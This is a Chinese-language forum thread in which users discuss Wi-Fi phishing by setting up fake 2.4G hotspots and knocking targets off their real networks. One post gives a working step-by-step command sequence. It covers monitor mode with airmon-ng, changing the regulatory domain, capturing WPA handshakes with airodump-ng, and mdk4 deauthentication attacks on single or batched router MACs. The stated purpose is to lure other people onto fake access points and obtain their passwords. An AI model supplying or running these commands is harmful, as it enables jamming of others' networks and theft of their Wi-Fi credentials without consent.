5G的信号弱,且传输距离短,钓鱼的话,最好创建2.4G的伪热点,如果对方是双频路由器(客户端连接wifi时能 ...
2.4g的有些人不会连的,还是想要5g的热点,不过我的虚拟机创建不了5g的热点,网卡是8812au 本帖最后由 xun73tian 于 2025-3-11 16:08 编辑
如不意 发表于 2025-3-11 14:52
2.4g的有些人不会连的,还是想要5g的热点,不过我的虚拟机创建不了5g的热点,网卡是8812au ...
大多数情况下,路由器2.4G的密码和5G的密码设置是一致的,获取到了2.4G的也就获取到了5G的密码。
只要完全打死了对方的5G和2.4G信号,自然就会有人连2.4G的伪信号。
xun73tian 发表于 2025-3-11 16:05
大多数情况下,路由器2.4G的密码和5G的密码设置是一致的,获取到了2.4G的也就获取到了5G的密码。
只要完全 ...
理论上是这样的,但是总会有不使用2.4g网络的,我就遇到过 本帖最后由 angel725 于 2025-3-12 13:29 编辑
xun73tian 发表于 2025-3-11 14:33
你的截图中显示,是能扫描到5G信号的,只是没有客户端连接而已。信号强度这么好!难道不是你自家的? ...
终于扫到我家的5g和连接的手机了
但是我攻击为什么5G不掉线呢?
本帖最后由 xun73tian 于 2025-3-12 16:13 编辑
angel725 发表于 2025-3-12 13:04
终于扫到我家的5g和连接的手机了
airodump-ng抓包步骤:单网卡
一、终端一:选择攻击的路由
systemctl stop NetworkManager
airmon-ng check kill
iw reg get (查看国家监管域,默认为00)
iw reg set IN (临时设置全局国家监管域为IN)
或者
iw reg set PA
iwconfig(查看无线网卡信息)
airmon-ng start wlan1 (开启无线网卡监听模式)
airodump-ng wlan1 --band a(扫描5.0G的路由)
或者
airodump-ng wlan1 --band bg(扫描2.4G的路由)
airodump-ng -w 包命名 -c 信道 --bssid 路由地址 wlan1
//抓取握手包,被动抓包(适应于2.4G和5.0G)
二、终端二:mdk4攻击
mdk4 wlan1 d-B 路由地址(攻击具体路由)
mdk4批量攻击路由:补充
把要攻击的目标MAC写入到/root/1.txt文本中。
echo 6C:B1:58:E8:0C:60 >1.txt (覆盖输入)
echo 6C:B1:58:E8:0C:61 >>1.txt(追加输入)
mdk4 wlan1 d -b ./1.txt(可同时攻击2.4和5G) 看你干嘛用,如果跑包用,无所谓,毕竟谁跟我一样闲的没事2.4G一个密码,5G一个密码:P:P:P:P
页:
1
[2]